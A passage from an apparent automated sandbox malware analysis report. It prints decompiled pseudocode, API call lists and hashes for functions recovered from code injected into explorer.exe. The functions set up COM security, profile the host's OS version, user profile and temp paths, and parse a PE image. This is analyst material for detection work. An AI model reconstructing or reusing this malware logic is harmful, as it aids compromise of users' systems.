                                                                                                                                                                        							}
                                                                                                                                                                        							__imp__#16(_v24);
                                                                                                                                                                        							_t210 = _v28;
                                                                                                                                                                        							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                        							_t252 = _v20;
                                                                                                                                                                        							L42:
                                                                                                                                                                        							_t262 = _v32;
                                                                                                                                                                        							_t252 = _t252 + 1;
                                                                                                                                                                        							_v20 = _t252;
                                                                                                                                                                        							__eflags = _t262;
                                                                                                                                                                        							if(_t262 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							L48:
                                                                                                                                                                        							_t324 = _v40;
                                                                                                                                                                        							goto L49;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t247 = _v28;
                                                                                                                                                                        						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E007A8BF4( &_v36, _t322);
                                                                                                                                                                        					_t320 = _v36;
                                                                                                                                                                        					goto L53;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x007aee99
                                                                                                                                                                        0x007aeb35
                                                                                                                                                                        0x007aeb38
                                                                                                                                                                        0x007aeb3b
                                                                                                                                                                        0x007aeb3e
                                                                                                                                                                        0x007aeb40
                                                                                                                                                                        0x007aee5b
                                                                                                                                                                        0x007aee5e
                                                                                                                                                                        0x007aee61
                                                                                                                                                                        0x007aee63
                                                                                                                                                                        0x007aee85
                                                                                                                                                                        0x007aee8a
                                                                                                                                                                        0x007aee65
                                                                                                                                                                        0x007aee68
                                                                                                                                                                        0x007aee73
                                                                                                                                                                        0x007aee7a
                                                                                                                                                                        0x007aee7a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb46
                                                                                                                                                                        0x007aeb46
                                                                                                                                                                        0x007aeb58
                                                                                                                                                                        0x007aeb5b
                                                                                                                                                                        0x007aeb5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb65
                                                                                                                                                                        0x007aeb68
                                                                                                                                                                        0x007aeb6b
                                                                                                                                                                        0x007aeb6e
                                                                                                                                                                        0x007aeb71
                                                                                                                                                                        0x007aeb74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb7a
                                                                                                                                                                        0x007aeb88
                                                                                                                                                                        0x007aeb8b
                                                                                                                                                                        0x007aeb8d
                                                                                                                                                                        0x007aeba6
                                                                                                                                                                        0x007aebb5
                                                                                                                                                                        0x007aebbd
                                                                                                                                                                        0x007aebbd
                                                                                                                                                                        0x007aebc0
                                                                                                                                                                        0x007aebc7
                                                                                                                                                                        0x007aebcb
                                                                                                                                                                        0x007aebd1
                                                                                                                                                                        0x007aebd3
                                                                                                                                                                        0x007aee43
                                                                                                                                                                        0x007aee49
                                                                                                                                                                        0x007aee4f
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x007aebe2
                                                                                                                                                                        0x007aebf6
                                                                                                                                                                        0x007aebfa
                                                                                                                                                                        0x007aebfc
                                                                                                                                                                        0x007aec01
                                                                                                                                                                        0x007aee10
                                                                                                                                                                        0x007aee16
                                                                                                                                                                        0x007aee21
                                                                                                                                                                        0x007aee2c
                                                                                                                                                                        0x007aee32
                                                                                                                                                                        0x007aee38
                                                                                                                                                                        0x007aee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee3b
                                                                                                                                                                        0x007aec07
                                                                                                                                                                        0x007aedde
                                                                                                                                                                        0x007aedde
                                                                                                                                                                        0x007aede1
                                                                                                                                                                        0x007aede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec0f
                                                                                                                                                                        0x007aec17
                                                                                                                                                                        0x007aec1e
                                                                                                                                                                        0x007aec24
                                                                                                                                                                        0x007aec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec2f
                                                                                                                                                                        0x007aec44
                                                                                                                                                                        0x007aec4a
                                                                                                                                                                        0x007aec53
                                                                                                                                                                        0x007aec56
                                                                                                                                                                        0x007aec59
                                                                                                                                                                        0x007aec5b
                                                                                                                                                                        0x007aedd1
                                                                                                                                                                        0x007aedd4
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x007aec6b
                                                                                                                                                                        0x007aec6e
                                                                                                                                                                        0x007aec75
                                                                                                                                                                        0x007aec7b
                                                                                                                                                                        0x007aec7e
                                                                                                                                                                        0x007aec81
                                                                                                                                                                        0x007aec84
                                                                                                                                                                        0x007aec87
                                                                                                                                                                        0x007aecc3
                                                                                                                                                                        0x007aecc3
                                                                                                                                                                        0x007aecc6
                                                                                                                                                                        0x007aed72
                                                                                                                                                                        0x007aed86
                                                                                                                                                                        0x007aed96
                                                                                                                                                                        0x007aed9a
                                                                                                                                                                        0x007aed9c
                                                                                                                                                                        0x007aedb3
                                                                                                                                                                        0x007aedb7
                                                                                                                                                                        0x007aedc0
                                                                                                                                                                        0x007aedcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aedcb
                                                                                                                                                                        0x007aeda2
                                                                                                                                                                        0x007aeda3
                                                                                                                                                                        0x007aeda8
                                                                                                                                                                        0x007aeda8
                                                                                                                                                                        0x007aedaa
                                                                                                                                                                        0x007aedab
                                                                                                                                                                        0x007aedb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aedb0
                                                                                                                                                                        0x007aeccc
                                                                                                                                                                        0x007aeccc
                                                                                                                                                                        0x007aeccf
                                                                                                                                                                        0x007aed3a
                                                                                                                                                                        0x007aed4e
                                                                                                                                                                        0x007aed5e
                                                                                                                                                                        0x007aed62
                                                                                                                                                                        0x007aed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aed6a
                                                                                                                                                                        0x007aed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aed6b
                                                                                                                                                                        0x007aecd1
                                                                                                                                                                        0x007aecd1
                                                                                                                                                                        0x007aecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecd6
                                                                                                                                                                        0x007aecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecdb
                                                                                                                                                                        0x007aecdb
                                                                                                                                                                        0x007aece1
                                                                                                                                                                        0x007aecfd

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE413
                                                                                                                                                                          • Part of subcall function 007AE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE424
                                                                                                                                                                          • Part of subcall function 007AE400: CoCreateInstance.OLE32(007BC868,00000000,00000001,007BC878,?,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE43B
                                                                                                                                                                          • Part of subcall function 007AE400: SysAllocString.OLEAUT32(00000000), ref: 007AE446
                                                                                                                                                                          • Part of subcall function 007AE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE471
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AEAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AEB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AEE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AEE99
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: 79d4038f6a510713a32cb1dd4923de1663421fdffb7003722fd23708bb1214e7
                                                                                                                                                                        • Instruction ID: c4f2abf719a32e4c2046ef4cebb130f7f3372d7786eab4f1a3500a51a5f93e68
                                                                                                                                                                        • Opcode Fuzzy Hash: 79d4038f6a510713a32cb1dd4923de1663421fdffb7003722fd23708bb1214e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE16371E00219EFDB14DFE4C889EEEBBB9FF89300F148659E515A7255DB38A901CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E007ADF3D(void* __fp0) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v144;
                                                                                                                                                                        				char _v656;
                                                                                                                                                                        				char _v668;
                                                                                                                                                                        				char _v2644;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                        				short _t106;
                                                                                                                                                                        				char _t108;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				intOrPtr _t123;
                                                                                                                                                                        				intOrPtr _t136;
                                                                                                                                                                        				intOrPtr _t138;
                                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t148;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				WCHAR* _t150;
                                                                                                                                                                        				char* _t151;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				char _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				char* _t200;
                                                                                                                                                                        				void* _t203;
                                                                                                                                                                        				int* _t204;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        
                                                                                                                                                                        				_t216 = __fp0;
                                                                                                                                                                        				_t148 =  *0x7bf830; // 0x7a0000
                                                                                                                                                                        				_t68 = E007A8BDE(0x1ac4);
                                                                                                                                                                        				_t192 = _t68;
                                                                                                                                                                        				if(_t192 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                        					_t70 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                        					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                        					E007B3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                        					_t73 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                        					_t194 = _t5;
                                                                                                                                                                        					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                        					_t207 = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x1854)) = E007A95F3(_t194, _t207);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t75 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t77 = E007AC879( *((intOrPtr*)(_t75 + 0x12c))());
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
                                                                                                                                                                        					_t159 =  *_t77;
                                                                                                                                                                        					if(E007AC9F4( *_t77) == 0) {
                                                                                                                                                                        						_t79 = E007AC8C9(_t159, _t194);
                                                                                                                                                                        						__eflags = _t79;
                                                                                                                                                                        						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                        						__eflags = _t162;
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t14 = _t192 + 0x220; // 0x220
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x218)) = E007AF3A3(_t14);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x21c)) = E007AF368(_t14);
                                                                                                                                                                        					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                        					_t195 = _t17;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                        					_v12 = 0x80;
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					_v8 = 0x100;
                                                                                                                                                                        					_push( &_v656);
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(_t195);
                                                                                                                                                                        					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
                                                                                                                                                                        					_t87 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t89 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
                                                                                                                                                                        					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                        					_t149 = _t28;
                                                                                                                                                                        					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                        					E007ADF36(_t149);
                                                                                                                                                                        					_t211 = _t149;
                                                                                                                                                                        					if(_t149 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x434)) = E007A95F3(_t149, _t211);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t92 = E007AC6CE();
                                                                                                                                                                        					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                        					_t196 = _t33;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                        					_t93 = E007AC4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                        					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                        					E007A99DF(_t93, _t33, _t35);
                                                                                                                                                                        					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                        					E007A960D(_t149, _t36);
                                                                                                                                                                        					_t97 = E007AE2C5(_t196, E007AA43D(_t33), 0);
                                                                                                                                                                        					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E007AC6E4(_t97, _t37, _t216);
                                                                                                                                                                        					_t99 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x101c)) = E007ACA46( *((intOrPtr*)(_t99 + 0x12c))(_t195));
                                                                                                                                                                        					E007A8D6D(_t192, 0, 0x9c);
                                                                                                                                                                        					_t204 = _t203 + 0xc;
                                                                                                                                                                        					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                        					GetVersionExA(_t192);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xa8)) = E007ADD39(_t100);
                                                                                                                                                                        					_t106 = E007ADD62(_t105);
                                                                                                                                                                        					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                        					_t150 = _t41;
                                                                                                                                                                        					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                        					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                        					_t108 = E007A9DF2(_t105, 0x9cf);
                                                                                                                                                                        					_t177 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t198 = _t108;
                                                                                                                                                                        					 *_t204 = 0x104;
                                                                                                                                                                        					_push( &_v668);
                                                                                                                                                                        					_push(_t198);
                                                                                                                                                                        					_v8 = _t198;
                                                                                                                                                                        					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                        						_t143 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8BAF( &_v8);
                                                                                                                                                                        					_t113 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                        					_t199 = _t48;
                                                                                                                                                                        					 *_t204 = 0x209;
                                                                                                                                                                        					_push(_t199);
                                                                                                                                                                        					_push(L"USERPROFILE");
                                                                                                                                                                        					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                        						E007A9E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                        						_t141 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						_t204 =  &(_t204[5]);
                                                                                                                                                                        						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x20a);
                                                                                                                                                                        					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                        					_t151 = L"TEMP";
                                                                                                                                                                        					_t116 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_push(_t151);
                                                                                                                                                                        					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                        						_t138 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x40);
                                                                                                                                                                        					_t200 = L"SystemDrive";
                                                                                                                                                                        					_push( &_v144);
                                                                                                                                                                        					_t119 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_push(_t200);
                                                                                                                                                                        					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                        						_t136 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                        					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                        					_t123 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                        					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E007B3548(E007AE2C5(_t62, E007AA43D(_t62), 0),  &_v2644);
                                                                                                                                                                        					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                        					E007B351A( &_v2644, _t63, 0x20);
                                                                                                                                                                        					_push( &_v2644);
                                                                                                                                                                        					_push(0x1e);
                                                                                                                                                                        					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                        					_t191 = 0x14;
                                                                                                                                                                        					E007A96DA(_t66, _t191);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1898)) = E007ADAE3(_t191);
                                                                                                                                                                        					return _t192;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t68;
                                                                                                                                                                        			}

                                                                                                                                                                        0x007ae096
                                                                                                                                                                        0x007ae09e
                                                                                                                                                                        0x007ae0a3
                                                                                                                                                                        0x007ae0a3
                                                                                                                                                                        0x007ae0a9
                                                                                                                                                                        0x007ae0b4
                                                                                                                                                                        0x007ae0b9
                                                                                                                                                                        0x007ae0c1
                                                                                                                                                                        0x007ae0c7
                                                                                                                                                                        0x007ae0cf
                                                                                                                                                                        0x007ae0e1
                                                                                                                                                                        0x007ae0e7
                                                                                                                                                                        0x007ae0ef
                                                                                                                                                                        0x007ae0f4
                                                                                                                                                                        0x007ae112
                                                                                                                                                                        0x007ae118
                                                                                                                                                                        0x007ae11d
                                                                                                                                                                        0x007ae120
                                                                                                                                                                        0x007ae123
                                                                                                                                                                        0x007ae130
                                                                                                                                                                        0x007ae136
                                                                                                                                                                        0x007ae140
                                                                                                                                                                        0x007ae140
                                                                                                                                                                        0x007ae146
                                                                                                                                                                        0x007ae14e
                                                                                                                                                                        0x007ae159
                                                                                                                                                                        0x007ae15e
                                                                                                                                                                        0x007ae164
                                                                                                                                                                        0x007ae166
                                                                                                                                                                        0x007ae173
                                                                                                                                                                        0x007ae174
                                                                                                                                                                        0x007ae175
                                                                                                                                                                        0x007ae180
                                                                                                                                                                        0x007ae182
                                                                                                                                                                        0x007ae189
                                                                                                                                                                        0x007ae189
                                                                                                                                                                        0x007ae193
                                                                                                                                                                        0x007ae198
                                                                                                                                                                        0x007ae19d
                                                                                                                                                                        0x007ae19d
                                                                                                                                                                        0x007ae1a3
                                                                                                                                                                        0x007ae1aa
                                                                                                                                                                        0x007ae1ab
                                                                                                                                                                        0x007ae1b8
                                                                                                                                                                        0x007ae1cb
                                                                                                                                                                        0x007ae1d0
                                                                                                                                                                        0x007ae1d5
                                                                                                                                                                        0x007ae1de
                                                                                                                                                                        0x007ae1de
                                                                                                                                                                        0x007ae1e4
                                                                                                                                                                        0x007ae1e9
                                                                                                                                                                        0x007ae1ef
                                                                                                                                                                        0x007ae1f5
                                                                                                                                                                        0x007ae1fa
                                                                                                                                                                        0x007ae203
                                                                                                                                                                        0x007ae205
                                                                                                                                                                        0x007ae20c
                                                                                                                                                                        0x007ae20c
                                                                                                                                                                        0x007ae212
                                                                                                                                                                        0x007ae21a
                                                                                                                                                                        0x007ae21f
                                                                                                                                                                        0x007ae220
                                                                                                                                                                        0x007ae225
                                                                                                                                                                        0x007ae22e
                                                                                                                                                                        0x007ae230
                                                                                                                                                                        0x007ae23b
                                                                                                                                                                        0x007ae23b
                                                                                                                                                                        0x007ae244
                                                                                                                                                                        0x007ae24c
                                                                                                                                                                        0x007ae253
                                                                                                                                                                        0x007ae258
                                                                                                                                                                        0x007ae267
                                                                                                                                                                        0x007ae27f
                                                                                                                                                                        0x007ae286
                                                                                                                                                                        0x007ae294
                                                                                                                                                                        0x007ae29f
                                                                                                                                                                        0x007ae2a0
                                                                                                                                                                        0x007ae2a4
                                                                                                                                                                        0x007ae2aa
                                                                                                                                                                        0x007ae2ab
                                                                                                                                                                        0x007ae2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ae2c0
                                                                                                                                                                        0x007ae2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 007ADF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007AE05E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 007AE123
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 007AE14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3743117707-2706916422
                                                                                                                                                                        • Opcode ID: cf49ca8f8bc9c870085bbcaee02c056118686345fdf72ea248ca61e06a58e86e
                                                                                                                                                                        • Instruction ID: 0597e30464e1835fe014ab473e1a3b4b0bc2ef85eb7ba9c0ac881494b7270437
                                                                                                                                                                        • Opcode Fuzzy Hash: cf49ca8f8bc9c870085bbcaee02c056118686345fdf72ea248ca61e06a58e86e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F91CE71700605EFD704EB74DC4AFEAB7A8BF49700F008239F61997291DB78AA508BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E007AD447(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                        				struct HINSTANCE__* _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				struct HINSTANCE__* _v28;
                                                                                                                                                                        				short _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr* _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				struct HINSTANCE__* _v53;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				short _v68;
                                                                                                                                                                        				struct _WNDCLASSEXA _v116;
                                                                                                                                                                        				char _t81;
                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				intOrPtr _t90;
                                                                                                                                                                        				intOrPtr _t95;
                                                                                                                                                                        				char _t97;
                                                                                                                                                                        				short _t98;
                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				char _t119;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				struct HWND__* _t132;
                                                                                                                                                                        				struct HINSTANCE__* _t138;
                                                                                                                                                                        				intOrPtr _t145;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				char _t154;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				intOrPtr _t158;
                                                                                                                                                                        				intOrPtr _t160;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				char _t163;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        
                                                                                                                                                                        				_t81 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t157 = __edx;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                        					E007AF0DE(0x1f4);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                                                                                        				_t83 =  *_t12 + _t157;
                                                                                                                                                                        				_v28 = _t138;
                                                                                                                                                                        				_v40 = _t83;
                                                                                                                                                                        				if( *_t83 != 0x4550) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					_t158 = _v12;
                                                                                                                                                                        					L15:
                                                                                                                                                                        					if(_v8 != _t138) {
                                                                                                                                                                        						_t90 =  *0x7bf918; // 0x0
                                                                                                                                                                        						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                                                                                        						_v8 = _t138;
                                                                                                                                                                        					}
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                        						_t87 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						_t160 =  *0x7bf918; // 0x0
                                                                                                                                                                        						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                        						_t85 =  *0x7bf918; // 0x0
                                                                                                                                                                        						 *((intOrPtr*)(_t85 + 0x20))(_v20);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
